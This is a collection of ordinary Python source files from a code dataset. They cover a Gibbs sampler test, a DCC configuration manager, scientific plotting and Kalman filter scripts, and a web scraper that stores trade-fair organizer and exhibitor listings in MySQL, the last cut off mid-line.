'login.ignore' in request:\n return False\n return super(SessionCredentialsPlugin, self).challenge(request)\n\nclass DomainSessionCredentialsPlugin(SessionCredentialsPlugin):\n\n _fields = SessionCredentialsPlugin._fields + (('domain', 'login.domain'),)\n","sub_path":"Sandbox/J1m/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613169543","text":"import unittest\nfrom abc import ABC\n\nimport numpy as np\n\nfrom pygibbs.gibbs import hlm\n\n\nclass ConsistencyTest(ABC):\n\n def setUp(self, mod, nres=int(1e3), nobs=int(1e3), nvar=2, tol=(1e-1, 1e-1)):\n\n self.mod = mod\n self.tol = tol\n self.data, self.gt, self.hyper = self.mod._generate_fixture(nres, nobs, nvar)\n\n def test_map(self, niter=int(1e2)):\n\n map = self.mod.estimate(niter, *self.data, *self.hyper)\n for est, true in zip(map[1], self.gt[1]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_pev(self, niter=int(1e2)):\n\n samples = self.mod.sample(niter, *self.data, *self.hyper)\n for est, true in zip([np.mean(x, 0) for x in samples[1]], self.gt[1]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_map_eta(self):\n\n map = self.mod.estimate_eta(self.data, self.gt[1])\n for est, true in zip(map, self.gt[0]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_map_theta(self):\n\n map = self.mod.estimate_theta(self.data, self.gt[0], self.hyper)\n for est, true in zip(map, self.gt[1]):\n np.testing.assert_allclose(est, true, *self.tol)\n\n def test_logmargin(self):\n\n map = self.mod.estimate_theta(self.data, self.gt[0], self.hyper)\n np.testing.assert_allclose(self.mod.eval_logobserved(self.data, map),\n self.mod.eval_loglik(self.data, self.gt[0], map).sum(),\n *self.tol)\n\n\nclass ConsistencyTest_hlm(ConsistencyTest, unittest.TestCase):\n def setUp(self):\n super(ConsistencyTest_hlm, self).setUp(hlm)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/gibbs_tests.py","file_name":"gibbs_tests.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273322917","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains implementation for preferences manager\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport os\n\nimport metayaml\n\nimport tpDcc as tp\nfrom tpDcc import register\nfrom tpDcc.core import config\nfrom tpDcc.libs.python import decorators, folder\n\n\nclass ConfigsManager(object):\n\n EXTENSION = 'yml'\n\n def __init__(self):\n self._package_configs = dict()\n\n # ============================================================================================================\n # BASE\n # ============================================================================================================\n\n def register_package_path(self, package_name, module_name, config_path, environment='development'):\n \"\"\"\n Registers configurations path for given package\n :param package_name: str, name of the package configuration files belong to\n :param module_name: str, name of the module this configuration belongs to\n :param config_path: str, path where configuration file is located\n \"\"\"\n\n if not config_path or not os.path.isdir(config_path):\n tp.logger.warning(\n 'Configuration Path \"{}\" for package \"{}\" does not exists!'.format(config_path, package_name))\n return\n\n if environment:\n config_path = os.path.join(config_path, environment.lower())\n if not os.path.isdir(config_path):\n tp.logger.warning(\n 'Configuration Folder for environment \"{}\" and package \"{}\" does not exists \"{}\"'.format(\n environment, package_name, config_path))\n return\n\n dcc_name = tp.Dcc.get_name()\n dcc_version = tp.Dcc.get_version_name()\n\n base_config = os.path.join(config_path, module_name)\n dcc_config_path = os.path.join(config_path, dcc_name, module_name)\n dcc_version_config_path = os.path.join(config_path, dcc_name, dcc_version, module_name)\n\n if package_name not in self._package_configs:\n self._package_configs[package_name] = dict()\n if module_name not in self._package_configs[package_name]:\n self._package_configs[package_name][module_name] = dict()\n\n config_extension = self.EXTENSION\n if not config_extension.startswith('.'):\n config_extension = '.{}'.format(config_extension)\n\n self._package_configs[package_name][module_name][environment] = {\n 'base': '{}{}'.format(base_config, config_extension),\n 'dcc': '{}{}'.format(dcc_config_path, config_extension),\n 'dcc_version': '{}{}'.format(dcc_version_config_path, config_extension)\n }\n\n def register_package_configs(self, package_name, config_path):\n \"\"\"\n Tries to find and registers all configuration paths of given path and in the given path\n :param package_name: str\n :param config_path: str\n \"\"\"\n\n config_extension = self.EXTENSION\n if not config_extension.startswith('.'):\n config_extension = '.{}'.format(config_extension)\n\n if not config_path or not os.path.isdir(config_path):\n return\n\n for environment in ['development', 'production']:\n config_files = folder.get_files(\n config_path, full_path=False, recursive=True, pattern='*{}'.format(config_extension))\n if not config_files:\n continue\n module_names = [os.path.splitext(file_path)[0] for file_path in config_files]\n for module_name in module_names:\n self.register_package_path(\n package_name=package_name, config_path=config_path,\n module_name=module_name, environment=environment)\n\n def get_config(self, config_name, package_name=None, root_package_name=None,\n environment=None, config_dict=None, parser_class=None, extra_data=None):\n \"\"\"\n Returns configuration\n :param package_name:\n :param root_package_name:\n :param config_name:\n :param environment:\n :param config_dict:\n :return:\n \"\"\"\n\n if config_dict is None:\n config_dict = dict()\n if extra_data is None:\n extra_data = dict()\n\n if not parser_class:\n parser_class = config.YAMLConfigurationParser\n\n if not package_name:\n package_name = config_name.replace('.', '-').split('-')[0]\n\n config_data = self._get_config_data(\n package_name=package_name, config_name=config_name,\n config_dict=config_dict, root_package_name=root_package_name, environment=environment)\n if config_data is None:\n config_data = dict()\n\n parsed_data = parser_class(config_data).parse()\n extra_data.update(parsed_data)\n new_config = config.DccConfig(config_name=config_name, environment=environment, data=extra_data)\n\n return new_config\n\n def _get_all_package_configs(self, package_name, root_package_name=None, environment=None, skip_non_existent=True):\n \"\"\"\n Internal function that returns a list with all configuration files of given package\n :param package_name: str\n :param root_package_name: str\n :param environment: str\n :param skip_non_existent: bool\n :return: list(dict)\n \"\"\"\n\n module_paths = dict()\n\n if root_package_name and root_package_name not in self._package_configs:\n tp.logger.warning(\n 'Impossible to retrieve package configs because root package: \"{}\" does not exist!'.format(\n root_package_name))\n return module_paths\n\n if package_name not in self._package_configs:\n tp.logger.warning(\n 'Impossible to retrieve package configs because package: \"{}\" does not exist!'.format(\n root_package_name))\n return module_paths\n\n packages_to_loop = list()\n if root_package_name:\n packages_to_loop = [root_package_name]\n packages_to_loop.append(package_name)\n\n for package_name in packages_to_loop:\n for module_name, env_dicts in self._package_configs[package_name].items():\n for env_name, module_dict in env_dicts.items():\n base_path = module_dict.get('base', None)\n dcc_path = module_dict.get('dcc', None)\n dcc_version_path = module_dict.get('dcc_version', None)\n found_paths = list()\n\n if environment and environment.lower() != env_name.lower():\n continue\n\n if skip_non_existent:\n if base_path and os.path.isfile(base_path):\n found_paths.append(base_path)\n if dcc_path and os.path.isfile(dcc_path):\n found_paths.append(dcc_path)\n if dcc_version_path and os.path.isfile(dcc_version_path):\n found_paths.append(dcc_version_path)\n else:\n if base_path:\n found_paths.append(base_path)\n if dcc_path:\n found_paths.append(dcc_path)\n if dcc_version_path:\n found_paths.append(dcc_version_path)\n if not found_paths:\n continue\n if module_name not in module_paths:\n module_paths[module_name] = list()\n\n module_paths[module_name].extend(found_paths)\n\n return module_paths\n\n def _get_config_data(self, package_name, config_name, config_dict, root_package_name=None, environment=None):\n \"\"\"\n Intgernal function that returns data of the given configuration\n :param package_name: str\n :param config_name: str\n :param config_dict: dict\n :param root_package_name: str\n :param environment: str\n :return:\n \"\"\"\n\n if not package_name:\n tp.logger.error('Impossible to find configuration if package is not given!')\n return None\n if not config_name:\n tp.logger.error('Impossible to to find configuration if configuration name is not given!')\n return None\n\n if package_name not in self._package_configs:\n tp.logger.error('No configurations find for package \"{}\"'.format(package_name))\n return None\n\n config_extension = self.EXTENSION\n if not config_extension.startswith('.'):\n config_extension = '.{}'.format(config_extension)\n\n valid_package_configs = self._get_all_package_configs(\n package_name=package_name, root_package_name=root_package_name, environment=environment)\n if not valid_package_configs or config_name not in valid_package_configs:\n # tp.logger.info(\n # 'Impossible to load configuration \"{}\" for package \"{}\" because it does not exists in '\n # 'configuration folders!'.format(config_name, package_name))\n return\n\n module_configs = valid_package_configs[config_name]\n\n # We read the last configuration found: dcc_version > dcc > base\n config_path = module_configs[-1]\n config_data = metayaml.read(module_configs, config_dict)\n if not config_data:\n raise RuntimeError('Configuration file \"{}\" is empty!'.format(config_path))\n\n # We store path where configuration file is located in disk\n if 'config' in config_data and 'path' in config_data['config']:\n raise RuntimeError('Configuration file cannot contains section with path attribute! {}'.format(\n self, config_path))\n if 'config' in config_data:\n config_data['config']['path'] = config_path\n else:\n config_data['config'] = {'path': config_path}\n\n return config_data\n\n\n@decorators.Singleton\nclass ConfigsManagerSingleton(ConfigsManager, object):\n \"\"\"\n Singleton class that holds preferences manager instance\n \"\"\"\n\n def __init__(self):\n ConfigsManager.__init__(self)\n\n\nregister.register_class('ConfigsMgr', ConfigsManagerSingleton)\n","sub_path":"tpDcc/managers/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465793976","text":"mol_change={'ERK':'ERK', 'MEK':'MEK','MKP1':'MKP1','PP2A':'PP2A','Raf':'Raf1','bRaf':'bRaf','dRaf1Ras':'dRaf1Ras','cAMP':'cAMP','PDE2':'PDE2','PDE4':'PDE4','PKA':'PKA','PKAc':'PKAc','Src':'Src','Cbl':'Cbl','CRKC3G':'CRKC3G','CamCa4':'CamCa4','CKpCamCa4':'CKpCamCa4','CKpCamCa4SynGap':'CKpCamCa4SynGap','PP1':'PP1','IP35':'Ip35','NgCam':'NgCam','Grb2':'Grb2','Sos':'Sos','Shc':'Shc','RasGRF':'RasGRF','Epac':'Epac','RasGDP':'RasGDP','Rap1GDP':'Rap1GDP','Ca':'Ca','Leak':'Leak','pmca':'pmca','ncx':'ncx','Calbin':'Calbin','CB':'CB','rasGap':'rasGap','rapGap':'rap1Gap','SynGap':'SynGap'}\n\nimport glob\nimport os\nfrom lxml import etree\nfrom xml.etree import ElementTree as ET\nimport numpy as np\n\ncrtl_list={}\nfilename='IC_ERK-Test_basald.xml'\nroot=ET.parse(filename).getroot()\nfor mol in mol_change.keys():\n for elem in root:\n for subelem in elem:\n if mol==subelem.attrib['specieID']:\n val=float(subelem.attrib['value'])\n crtl_list[mol]=val\n\nPATH='./'\npattern_IC=PATH+'IC'+'*'+'random*'+'*.xml'\nIC_filename=sorted(glob.glob(pattern_IC)) \nall_list={}\n#\nfor file_name in IC_filename:\n root=ET.parse(file_name).getroot()\n f=file_name.split('-')[-1].split('.')[0]\n all_list[f]={}\n for mol in crtl_list.keys():\n for elem in root:\n for subelem in elem:\n if mol== subelem.attrib['specieID']:\n change_val=float(subelem.attrib['value'])/crtl_list[mol]\n all_list[f][mol]=change_val\noutfname='RandomAnalysis_mol.npy'\nnp.save(outfname,all_list)\n\n'''\n#to check data\ndat=np.load(outfname+'.npz',allow_pickle=True)\ndat.keys()\ndat['ctrl'].item() \n'''\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nplt.ion()\nimport math\n\ndf=pd.DataFrame.from_dict(all_list,orient='index')\ndf.to_csv('mol_list.txt')\n\n\nncols=6\nnrows=math.ceil(len(df.columns)/ncols)\n\nfig,axes=plt.subplots(nrows,ncols)\nfor i, col in enumerate(df.columns):\n for r in range(nrows):\n for c in range(ncols):\n df[col].plot.bar(ax=axes[r,c],title=col)\n ###plt.title(col)\n\n\n","sub_path":"Experiment/simulation/4_Robustness/analysis/Random/mol_analysis.py","file_name":"mol_analysis.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329128555","text":"import numpy as np\nimport sys\nsys.path.append('./')\nsys.path.append('./fft')\n\nimport torch\nif sys.platform == \"darwin\":\n import matplotlib\n matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom ar_image import Corr\nfrom skimage import color\nfrom skimage import io\nfrom boxx import *\nfrom myfft.fft import fft_decompose, fft_recompose\nfrom vis.vis_radar import vis_radar\n\n\ndef read_grey(path):\n return color.rgb2gray(io.imread('pics/p0.png'))\n\n\nuse_cuda = False\n# if torch.has_cudnn:\n# use_cuda = True\n\n\nR = np.load(\"pics/R.npz\")\nR = R[\"arr_0\"]\n\nimg0 = R[0]\nimg1 = R[1]\nimg2 = R[2]\n\nres = fft_decompose(R, ar_order=2, n_cascade_levels=8, R_thr=-10)\n\nprint(\">>> ori img0\")\n#loga(img0)\nprint(res[0].keys())\nfor i in range(8):\n img = res[0][\"cascade_levels\"][i]\n #plt.imshow(img)\n #plt.show()\nR = res[0][\"cascade_levels\"]\nprint(\"res[0].keys()\", res[0].keys())\n\nout_img = fft_recompose(R)\n\nprint(\">>> out_img\")\n# loga(out_img)\n\n\nprint(\"img0\", img0.shape)\nh = img0.shape[0]\nw = img0.shape[1]\n\nimg0 = np.reshape(img0, (1, 1, h, w))\nimg1 = np.reshape(img1, (1, 1, h, w))\nimg2 = np.reshape(img2, (1, 1, h, w))\nimg0 = torch.from_numpy(img0)\nimg1 = torch.from_numpy(img1)\nimg2 = torch.from_numpy(img2)\nif use_cuda:\n img0 = img0.cuda()\n img1 = img1.cuda()\n img2 = img2.cuda()\n\nR_thr = -10\nmask_R0 = img0 >= R_thr\nmask_R1 = img1 >= R_thr\nmask_R2 = img2 >= R_thr\nmask_R = mask_R0 * mask_R1 * mask_R2\nmask_R = mask_R[0,0].float()\n\n### patch level ###\n# corr_module = Corr(window_size=9, sigma=3)\n\n### image level ###\ncorr_module = Corr(image_level=True)\nif use_cuda:\n corr_module = corr_module.cuda()\nimg3 = corr_module(img0, img1, img2, mask_R)\n\n\nvis_radar(img0[0,0].data.numpy(), \"nofft_R0.png\")\nvis_radar(img1[0,0].data.numpy(), \"nofft_R1.png\")\nvis_radar(img2[0,0].data.numpy(), \"nofft_R2.png\")\nvis_radar(img3[0,0].data.numpy(), \"nofft_R3.png\")\n\nplt.imshow(img3[0,0].float())\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"main_image.py","file_name":"main_image.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198503158","text":"\nfrom ROOT import *\nfrom array import array\nfrom math import fabs, sqrt\n\ndef function ():\n gStyle.SetOptStat(0)\n\n binxmet = 0\n binxmetR = 0\n\n rootfile = TFile.Open(\"./forMichael.root\")\n rootfile.ls()\n\n #Hmet = TH1D(\"Hmet\",\"Hmet\",40,0,200)\n #HmetR = TH1D(\"HmetR\",\"HmetR\",40,0,200)\n\n c1 = TCanvas(\"c1\",\"c1\",600,500)\n c1.cd()\n\n Hmet = gROOT.FindObject('h_met')\n \n for i in range(Hmet.GetNbinsX()):\n if (Hmet.GetBinContent(i) > binxmet):\n binxmet = Hmet.GetBinContent(i)\n\n Hmet.SetMarkerStyle(20)\n Hmet.SetMarkerSize(0.5)\n Hmet.SetMarkerColor(kRed)\n HmetR = gROOT.FindObject(\"h_met_R2g0p035\")\n\n for i in range(Hmet.GetNbinsX()):\n if (HmetR.GetBinContent(i) > binxmetR):\n binxmetR = HmetR.GetBinContent(i)\n \n scale = binxmetR/binxmet\n #scale = HmetR.Integral()/Hmet.Integral()\n\n HmetR.SetMarkerStyle(20)\n HmetR.SetMarkerSize(0.5)\n HmetR.SetMarkerColor(kBlue)\n \n Hmet.Scale(scale)\n\n Hmet.SetTitle(\"\")\n Hmet.GetXaxis().SetTitle(\"MET (GeV)\")\n Hmet.GetYaxis().SetTitle(\"A.U.\")\n Hmet.GetXaxis().SetRangeUser(0,1000)\n\n leg = TLegend(0.55,0.70,0.89,0.89)\n leg.SetFillColor(kWhite)\n leg.SetTextSize(0.038)\n leg.SetTextFont(42)\n leg.SetBorderSize(0)\n leg.AddEntry(HmetR,\"MET with R^2>0.035\",\"p\")\n leg.AddEntry(Hmet,\"MET\",\"p\")\n\n c1.SetLogy()\n\n Hmet.Draw(\"L\")\n HmetR.Draw(\"Lsame\")\n leg.Draw(\"same\")\n\n c1.SaveAs(\"razorvariable.png\")\n\n #output = TFile.Open(\"./ctau\"+ctau1+\"andctau\"+ctau2+\"lambda\"+lamb+\"/output\"+str(phot)+\".root\",\"recreate\")\n\n #output.Close()\n\n\ndef main():\n function()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"DPAnalysis_Step3/razorvariable.py","file_name":"razorvariable.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221758911","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport copy\nfrom filterpy.kalman import IMMEstimator\nfrom filterpy.kalman import KalmanFilter\nfrom filterpy.common import Q_discrete_white_noise\nfrom math import sin, cos, sqrt, atan2\nfrom scipy.linalg import block_diag\nfrom tracker import simulateCircle as sc\nfrom tracker import predictIMM as imm\n\ndef sign(x):\n return(math.copysign(1,x))\n\ndef turning_target(N=600, turn_start=400):\n \"\"\" simulate a moving target blah\"\"\"\n\n #r = 1.\n dt = 1.\n phi_sim = np.array(\n [[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]])\n\n gam = np.array([[dt**2/2, 0],\n [dt, 0],\n [0, dt**2/2],\n [0, dt]])\n\n x = np.array([[2000, 0, 10000, -15.]]).T\n\n simxs = []\n\n for i in range(N):\n x = np.dot(phi_sim, x)\n if i >= turn_start:\n x += np.dot(gam, np.array([[.075, .075]]).T)\n #print(x)\n simxs.append(x)\n simxs = np.array(simxs)\n\n return simxs\n\ndef circle_target(N=50):\n simxs = []\n # R, MX, MY, MZ, gamma\n cs = sc.simulateCircle(90., 100., 100., 0., gamma=60.0)\n dn = 180. / float(N)\n alpha = 0.\n xo,yo,zo = cs.pointAt(0.)\n while alpha < 180.:\n #for alpha in range(0,360,N):\n x,y,z = cs.pointAt(alpha)\n vx = (xo - x) / dt\n vy = (yo - y) / dt\n xs = np.array([x,vx,y,vy]).T\n #print(xs)\n xo = x\n yo = y\n simxs.append(xs)\n alpha = alpha + dn\n\n return np.array(simxs)\n\ndef linear_target(N=50):\n m = 0.5\n b = 100.\n simxs = []\n for x in range(0,10*N,10):\n y = m*x+b\n xs = np.array([x,10.,y,5.])\n simxs.append(xs)\n return np.array(simxs)\n\nif __name__ == \"__main__\":\n\n N = 40\n dt = 0.04\n p = 100.\n q = 5.\n #track = turning_target(N)\n track = circle_target(N)\n #track = linear_target(N)\n alpha0 = atan2(track[0,2], track[0,0])\n alpha1 = atan2(track[1,2], track[1,0])\n omega = 1.41 * (alpha0 - alpha1) / dt\n print(omega)\n\n # create noisy measurements\n zs = np.zeros((N, 2))\n r = 0.5\n for i in range(N):\n px = track[i, 0] + np.random.randn()*r\n py = track[i, 2] + np.random.randn()*r\n #print \"px: %4.2f, py: %4.2f\" % (px,py)\n zs[i, 0] = px\n zs[i, 1] = py\n\n\n immfilter = imm.filterIMM(dt,omega,p,r,q)\n xstart = np.array([[10., 10., 0, 100., 1., 0]]).T\n immfilter.startAt(xstart)\n xs, probs = [], []\n for i, z in enumerate(zs):\n #z = np.array([z]).T\n #print(\"x: %4.2f, y: %4.2f\" % (z[0], z[1]))\n #bank.update(z)\n x = z[0]\n y = z[1]\n immfilter.update(x,y)\n xs.append(immfilter.bank.x.copy())\n probs.append(immfilter.bank.mu.copy())\n print(immfilter.bank.mu)\n\n\n xs = np.array(xs)\n #cvxs = np.array(cvxs)\n #caxs = np.array(caxs)\n probs = np.array(probs)\n plt.subplot(131)\n plt.title('imm2.py')\n plt.plot(track[:, 0], track[:, 2], '--r')\n plt.plot(xs[:, 0], xs[:, 3], 'k')\n plt.scatter(zs[:, 0], zs[:, 1], marker='+')\n\n plt.subplot(132)\n plt.plot(probs[:, 0], 'r')\n plt.plot(probs[:, 1], 'g')\n plt.plot(probs[:, 2], 'b')\n\n plt.ylim(0., 1.0)\n plt.legend(['p(cv)', 'p(ca)', 'p(ct)'])\n plt.title('probability ratio')\n\n plt.subplot(133)\n dx = (xs[:,0].T - zs[:,0]) / zs[:,0]\n dy = (xs[:,3].T - zs[:,1]) / zs[:,1]\n plt.plot(dx.T, 'g')\n plt.plot(dy.T, 'b')\n plt.title('relative error')\n plt.legend(['dx', 'dy'])\n plt.axhline(y=0, color='k')\n\n\n plt.show()\n","sub_path":"src/imm-turn-test.py","file_name":"imm-turn-test.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533240136","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport mysql.connector\r\nimport time\r\nfrom datetime import date\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"xxx\",\r\n user=\"xxx\",\r\n password=\"xxx\",\r\n database=\"xxx\"\r\n\r\n)\r\n\r\nmycursor = mydb.cursor(buffered=True)\r\n\r\nt = time.localtime()\r\ncurrent_time = time.strftime(\"%H_%M_%S\", t)\r\ntoday = str(date.today())\r\ntoday = today.replace(\"-\", \"_\")\r\n\r\nbasic_table_name_organizers = today + \"_\" + current_time + \"_\" + 'portal_targowy_organizers'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_organizers + \" (organizer_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, organizer_full_name VARCHAR(255), organizer_address VARCHAR(255), organizer_www VARCHAR(255), organizer_telephone int, organizer_email VARCHAR(255), organizer_page_url VARCHAR(255)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_organizers = \"INSERT INTO \" + basic_table_name_organizers + \" (organizer_id, organizer_full_name, organizer_address, organizer_www, organizer_telephone, organizer_email, organizer_page_url) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_categories = today + \"_\" + current_time + \"_\" + 'portal_targowy_categories'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_categories + \" (category_id int NOT NULL PRIMARY KEY, category_name VARCHAR(255)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_categories = \"INSERT INTO \" + basic_table_name_categories + \" (category_id, category_name) VALUES (%s, %s)\"\r\n\r\nbasic_table_name_offers_data = today + \"_\" + current_time + \"_\" + 'portal_targowy_offers_data'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_offers_data + \" (offer_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255), trade_portaltargowy_site VARCHAR(255), trade_fair VARCHAR(255), announce_date_valid VARCHAR(255), announce_type VARCHAR(255), description MEDIUMTEXT, exhibitor_name VARCHAR(255), exhibitor_address VARCHAR(255), exhibitor_www VARCHAR(255), exhibitor_telephone int, exhibitor_email VARCHAR(255), category_id int, FOREIGN KEY (category_id) REFERENCES \" + basic_table_name_categories + \"(category_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_offers_data = \"INSERT INTO \" + basic_table_name_offers_data + \" (offer_id, name, trade_portaltargowy_site, trade_fair, announce_date_valid, announce_type, description, exhibitor_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, category_id) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_exhibitors = today + \"_\" + current_time + \"_\" + 'portal_targowy_exhibitors'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_exhibitors + \" (exhibitor_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, exhibitor_full_name VARCHAR(255), exhibitor_address VARCHAR(255), exhibitor_www VARCHAR(255), exhibitor_telephone int, exhibitor_email VARCHAR(255), exhibitor_logo VARCHAR(255)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_exhibitors = \"INSERT INTO \" + basic_table_name_exhibitors + \" (exhibitor_id, exhibitor_full_name, exhibitor_address, exhibitor_www, exhibitor_telephone, exhibitor_email, exhibitor_logo) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_cat_j_exh = today + \"_\" + current_time + \"_\" + 'portal_targowy_cat_j_exh'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_cat_j_exh + \" (category_id int NOT NULL, FOREIGN KEY (category_id) REFERENCES \" + basic_table_name_categories + \"(category_id), exhibitor_id int NOT NULL, FOREIGN KEY (exhibitor_id) REFERENCES \" + basic_table_name_exhibitors + \"(exhibitor_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_cat_j_exh = \"INSERT INTO \" + basic_table_name_cat_j_exh + \" (category_id, exhibitor_id) VALUES (%s, %s)\"\r\n\r\nbasic_table_name_events = today + \"_\" + current_time + \"_\" + 'portal_targowy_events'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_events + \" (event_id int NOT NULL AUTO_INCREMENT PRIMARY KEY, event_full_name VARCHAR(255), event_logo VARCHAR(255), event_date VARCHAR(255), event_localization VARCHAR(255), event_www VARCHAR(255), event_description MEDIUMTEXT, organizer_id int, FOREIGN KEY (organizer_id) REFERENCES \" + basic_table_name_organizers + \"(organizer_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_events = \"INSERT INTO \" + basic_table_name_events + \" (event_id, event_full_name, event_logo, event_date, event_localization, event_www, event_description, organizer_id) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\r\n\r\nbasic_table_name_cat_j_ev = today + \"_\" + current_time + \"_\" + 'portal_targowy_cat_j_ev'\r\nsql_table_creation = \"CREATE TABLE \" + basic_table_name_cat_j_ev + \" (category_id int NOT NULL, FOREIGN KEY (category_id) REFERENCES \" + basic_table_name_categories + \"(category_id), event_id int NOT NULL, FOREIGN KEY (event_id) REFERENCES \" + basic_table_name_events + \"(event_id)) COLLATE=utf8_general_ci\"\r\nmycursor.execute(sql_table_creation)\r\nsqlFormula_cat_j_ev = \"INSERT INTO \" + basic_table_name_cat_j_ev + \" (category_id, event_id) VALUES (%s, %s)\"\r\n\r\npage_number = 1\r\norganizer_full_name = None\r\norganizer_address = None\r\norganizer_www = None\r\norganizer_telephone = None\r\norganizer_email = None\r\norganizer_id = 1\r\nwhile True:\r\n organizer_page_url = 'https://portaltargowy.pl/organizatorzy?page=' + str(page_number)\r\n print(\"organizer page number: \" + str(page_number))\r\n organizer_page_req = urllib.request.Request(organizer_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n organizer_page = urllib.request.urlopen(organizer_page_req)\r\n organizer_page_html = organizer_page.read()\r\n organizer_page.close()\r\n organizer_page_soup = BeautifulSoup(organizer_page_html, \"html.parser\")\r\n organizer_list = organizer_page_soup.findAll(\"div\", {\"class\": \"ccol-lg-8 col-md-6 mt-2\"})\r\n if not organizer_list:\r\n break\r\n for row in organizer_list:\r\n organizer_page_url = row.a[\"href\"]\r\n organizer_page_req = urllib.request.Request(organizer_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n organizer_page = urllib.request.urlopen(organizer_page_req)\r\n organizer_page_html = organizer_page.read()\r\n organizer_page.close()\r\n organizer_page_soup = BeautifulSoup(organizer_page_html, \"html.parser\")\r\n organizer_list = organizer_page_soup.select('#organizer .col-md-8')\r\n organizer_list = organizer_list[0].text.split('\\n')\r\n for y in range(5):\r\n # print(x)\r\n try:\r\n if organizer_list[y + 1].strip().startswith('Pełna nazwa'):\r\n organizer_full_name = organizer_list[y + 1].strip()\r\n organizer_full_name = organizer_full_name.replace('Pełna nazwa: ', '')\r\n except IndexError:\r\n continue\r\n try:\r\n if organizer_list[y + 1].strip().startswith('Adres'):\r\n organizer_address = organizer_list[y + 1].strip()\r\n organizer_address = organizer_address.replace('Adres: ', '')\r\n except IndexError:\r\n continue\r\n try:\r\n if organizer_list[y + 1].strip().startswith('WWW'):\r\n organizer_www = organizer_list[y + 1].strip()\r\n organizer_www = organizer_www.replace('WWW: ', '')\r\n except IndexError:\r\n continue\r\n try:\r\n if organizer_list[y + 1].strip().startswith('Telefon'):\r\n organizer_telephone = organizer_list[y + 1].strip()\r\n organizer_telephone = organizer_telephone.replace('Telefon: ', '')\r\n except IndexError:\r\n continue\r\n try:\r\n if organizer_list[y + 1].strip().startswith('E-mail'):\r\n organizer_email = organizer_list[y + 1].strip()\r\n organizer_email = organizer_email.replace('E-mail: ', '')\r\n except IndexError:\r\n continue\r\n print(organizer_full_name)\r\n print(organizer_address)\r\n print(organizer_www)\r\n print(organizer_telephone)\r\n print(organizer_email)\r\n sql_data_organizers = (organizer_id, organizer_full_name, organizer_address, organizer_www, organizer_telephone, organizer_email, organizer_page_url)\r\n # print(sql_data_organizer)\r\n mycursor.execute(sqlFormula_organizers, sql_data_organizers)\r\n organizer_full_name = None\r\n organizer_address = None\r\n organizer_www = None\r\n organizer_telephone = None\r\n organizer_email = None\r\n print(\"organizer nr: \" + str(organizer_id))\r\n organizer_id = organizer_id + 1\r\n page_number = page_number + 1\r\nevent_id = 1\r\noffer_id = 1\r\nexhibitor_id = 1\r\nexhibitor_full_name = None\r\nexhibitor_address = None\r\nexhibitor_www = None\r\nexhibitor_telephone = None\r\nexhibitor_email = None\r\nexhibitor_full_name_mysql = None\r\nexhibitor_address_mysql = None\r\n# x to liczba kategorii, należy wprowadzić ręcznie w kodzie\r\nfor x in range(17):\r\n category_id = x + 1\r\n offers_page_url = 'https://portaltargowy.pl/wyniki-wyszukiwania?q=&category=' + str(category_id)\r\n offers_page_req = urllib.request.Request(offers_page_url, headers={'User-Agent': \"Mozilla/5.0\"})\r\n offers_page = 